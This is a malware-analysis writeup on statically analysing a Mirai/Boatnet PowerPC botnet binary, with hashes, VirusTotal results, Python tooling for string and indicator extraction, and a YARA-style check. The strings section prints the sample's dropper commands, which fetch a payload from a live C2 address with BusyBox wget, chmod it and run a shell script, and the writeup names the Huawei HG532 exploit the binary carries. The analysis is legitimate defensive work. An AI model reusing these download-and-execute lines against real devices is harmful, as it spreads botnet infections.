Overview
This project performs static analysis of a real Mirai botnet ELF binary targeting PowerPC IoT devices (routers, cameras). The sample was obtained from MalwareBazaar and analyzed in an isolated Kali Linux VM with no internet access. The malware was never executed — analysis was performed entirely through static techniques.
Tools Used
file / md5sum / sha256sum
strings
binwalk
YARA
Python + VirusTotal API
Kali Linux (VirtualBox, Host-Only network)
Sample Info
| Property | Value |
|---|---|
| File name | boatnet.ppc.elf |
| File type | ELF 32-bit MSB, PowerPC |
| MD5 | 2a0ebf2aed3edc046104f9fc1309f60e |
| SHA256 | 87d0cb7aea86635fa05c97355d72d48feba4672ded22f44c0d79180357e70fd2 |
| Size | 65.24 KB |
| Exploits | CVE-2017-17215 |
| Source | MalwareBazaar (abuse.ch) |
Static Analysis
Static analysis was performed without executing the malware. The file was examined using standard Linux forensic tools to extract indicators of compromise.
Detection
VirusTotal scan returned 42/62 detections. The sample was identified as Trojan.Mirai/DDoS with tags: elf, exploit, spreader, CVE-2017-17215.
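As an added example (not the author's Python script, which lives in the GitHub repository), the lookup below shows how to query VirusTotal for a hash you already have rather than uploading the sample, and how to read the detection count out of the v3 response. The endpoint and the `last_analysis_stats` / `popular_threat_classification` field names follow the VirusTotal v3 API; the reply itself is constructed here so the code runs offline, and `offline_opener` is a stand-in for `urllib.request.urlopen`.

```python
import io
import json
import urllib.request

VT_FILES = "https://www.virustotal.com/api/v3/files/"

# Constructed v3-style response (not a real VirusTotal reply), shaped like
# data.attributes.last_analysis_stats and carrying the writeup's 42/62 figures.
CONSTRUCTED_REPORT = {
    "data": {
        "attributes": {
            "last_analysis_stats": {
                "harmless": 0, "malicious": 42, "suspicious": 0,
                "undetected": 20, "timeout": 0,
            },
            "popular_threat_classification": {
                "suggested_threat_label": "trojan.mirai/ddos",
            },
            "tags": ["elf", "exploit", "spreader", "cve-2017-17215"],
        }
    }
}


def build_hash_lookup(sha256, api_key):
    """GET /files/{hash}: queries by hash, so the binary itself is never sent to VT."""
    return urllib.request.Request(VT_FILES + sha256.lower(), headers={"x-apikey": api_key})


def detection_ratio(report):
    """Return (malicious, engines that gave a verdict); 'timeout' is excluded from the denominator."""
    stats = report["data"]["attributes"]["last_analysis_stats"]
    total = sum(stats.get(k, 0) for k in ("harmless", "malicious", "suspicious", "undetected"))
    return stats.get("malicious", 0), total


def threat_summary(report):
    """Suggested family label plus the sorted tag list from the file object."""
    attrs = report["data"]["attributes"]
    label = attrs.get("popular_threat_classification", {}).get("suggested_threat_label", "n/a")
    return label, sorted(attrs.get("tags", []))


def fetch_report(sha256, api_key, opener=urllib.request.urlopen):
    """The opener is injectable so the same flow can be exercised without network access."""
    with opener(build_hash_lookup(sha256, api_key)) as resp:
        return json.load(resp)


def offline_opener(request):
    """Stand-in for urlopen: checks the API-key header is present and serves the constructed report."""
    assert request.has_header("X-apikey"), "missing x-apikey header"
    return io.BytesIO(json.dumps(CONSTRUCTED_REPORT).encode())


if __name__ == "__main__":
    report = fetch_report(
        "87d0cb7aea86635fa05c97355d72d48feba4672ded22f44c0d79180357e70fd2",
        "YOUR_API_KEY", opener=offline_opener)
    malicious, total = detection_ratio(report)
    print(f"{malicious}/{total}", *threat_summary(report))
```

Drop the `opener` argument to hit the real API from a host that is allowed to talk to the internet; the analysis VM itself should stay on the host-only network.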

Strings Analysis — C2 Server Found
Relevant strings recovered with `strings`. They are the download-and-execute stage of the infection: fetch a dropper with BusyBox `wget`, make everything in the working directory executable, then run the shell script. The writeup treats 176.65.139.59 as the C2 server; in these strings it is the host the payload is fetched from.

```text
C2 server: 176.65.139.59
/bin/busybox wget http://176.65.139.59
chmod 777 * /tmp/binary
sh 8UsA.sh
```

Binwalk — Embedded XML Exploit
Binwalk reported an embedded XML document at offset 0xF6A9. It is a SOAP request body for CVE-2017-17215, a command injection in the UPnP DeviceUpgrade service of Huawei HG532 home gateways (TCP port 37215), compiled directly into the binary so the spreader can deliver the exploit itself.

YARA Rule
A custom YARA rule, Mirai_Boatnet_PPC, was written from the strings found during static analysis. Four of its six indicator strings matched the sample, enough to satisfy the rule's match condition.
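The script below is an added example, not the author's rule or tooling, and reproduces the static checks in this writeup in plain Python: the `file`-style ELF header read, hashing, a `strings -n 4` equivalent, IPv4 extraction, a binwalk-like search for embedded XML, and a YARA-style "four of six indicators" threshold. The sample buffer is constructed (a minimal ELF32 big-endian PowerPC header, the indicator strings reported above and a skeleton SOAP envelope), not the real boatnet.ppc.elf, and the six `INDICATORS` are assumed from the strings on this page rather than copied from the Mirai_Boatnet_PPC rule.

```python
import hashlib
import re
import struct

# Constructed stand-in for the sample (NOT the real boatnet.ppc.elf).
SAMPLE = (
    b"\x7fELF"            # magic
    + b"\x01"             # EI_CLASS   = 1 -> ELFCLASS32
    + b"\x02"             # EI_DATA    = 2 -> ELFDATA2MSB (big-endian)
    + b"\x01"             # EI_VERSION
    + b"\x00" * 9         # EI_OSABI, ABI version, padding
    + b"\x00\x02"         # e_type     = ET_EXEC
    + b"\x00\x14"         # e_machine  = EM_PPC (20)
    + b"\x00" * 100
    + b"/bin/busybox wget http://176.65.139.59\x00"
    + b"chmod 777 * /tmp/binary\x00"
    + b"sh 8UsA.sh\x00"
    + b"\x00" * 40
    # Skeleton SOAP envelope standing in for the embedded exploit document.
    + b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    + b"<s:Body>...</s:Body></s:Envelope>\x00"
)

EM_NAMES = {3: "x86", 8: "MIPS", 20: "PowerPC", 40: "ARM", 62: "x86-64"}


def elf_summary(data):
    """The fields `file` prints as 'ELF 32-bit MSB, PowerPC', read from e_ident and e_machine."""
    if data[:4] != b"\x7fELF" or len(data) < 20:
        return None
    bits = {1: 32, 2: 64}.get(data[4])
    endian = {1: "LSB", 2: "MSB"}.get(data[5])
    fmt = ">H" if data[5] == 2 else "<H"          # e_machine is in the file's own byte order
    machine = struct.unpack(fmt, data[18:20])[0]
    return {"bits": bits, "endian": endian, "machine": EM_NAMES.get(machine, hex(machine))}


def hashes(data):
    return {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


def printable_strings(data, min_len=4):
    """Equivalent of `strings -n 4`: runs of printable ASCII at least min_len bytes long."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_ipv4(data):
    """Candidate C2 / download hosts: dotted quads inside the printable strings."""
    return {ip for s in printable_strings(data) for ip in IPV4.findall(s)}


def find_embedded_xml(data):
    """Offsets of embedded XML documents, the way binwalk reports them."""
    return [m.start() for m in re.finditer(rb"<\?xml", data)]


# Assumed indicator set (six strings); the writeup's actual rule is not reproduced here.
INDICATORS = [
    b"/bin/busybox",
    b"176.65.139.59",
    b"chmod 777",
    b"/tmp/binary",
    b"8UsA.sh",
    b"<?xml",
]


def indicator_hits(data, indicators=INDICATORS):
    return [i.decode() for i in indicators if i in data]


def yara_style_match(data, indicators=INDICATORS, required=4):
    """Mirror of a YARA condition like `uint32be(0) == 0x7f454c46 and 4 of ($s*)`."""
    return data[:4] == b"\x7fELF" and len(indicator_hits(data, indicators)) >= required


if __name__ == "__main__":
    print(elf_summary(SAMPLE), hashes(SAMPLE)["sha256"])
    print(sorted(extract_ipv4(SAMPLE)), [hex(o) for o in find_embedded_xml(SAMPLE)])
    print(indicator_hits(SAMPLE), yara_style_match(SAMPLE))
```

Point `SAMPLE` at `open("boatnet.ppc.elf", "rb").read()` inside the isolated VM to run the same checks on the real file; none of the functions execute or parse anything beyond raw bytes, so the binary is never run.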


Key Findings
| Finding | Detail |
|---|---|
| Family | Mirai/Boatnet botnet |
| Architecture | PowerPC, 32-bit big-endian (IoT routers, cameras) |
| C2 Server | 176.65.139.59 |
| Exploits | CVE-2017-17215 (Huawei HG532 UPnP command injection) |
| VT Detections | 42/62 |
| Behaviour | Self-propagating spreader with the exploit payload embedded in the binary |
GitHub
Full writeup, YARA rule and Python script available on GitHub: